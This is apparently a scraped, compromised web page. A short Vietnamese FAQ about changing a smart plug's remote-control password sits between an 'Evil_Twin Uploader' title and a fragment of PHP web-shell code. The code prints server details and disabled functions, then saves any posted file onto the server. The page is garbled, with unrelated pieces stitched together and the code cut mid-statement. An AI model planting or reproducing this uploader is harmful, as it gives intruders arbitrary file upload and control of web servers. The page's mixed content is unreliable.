Evil_Twin Uploader

Tính năng sửa đổi mật khẩu từ xa là gì?

Khi bạn đã sửa đổi mật khẩu từ xa, không ai có thể điều khiển từ xa ổ cắm thông minh của bạn nữa trừ khi bạn chia sẻ mật khẩu.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial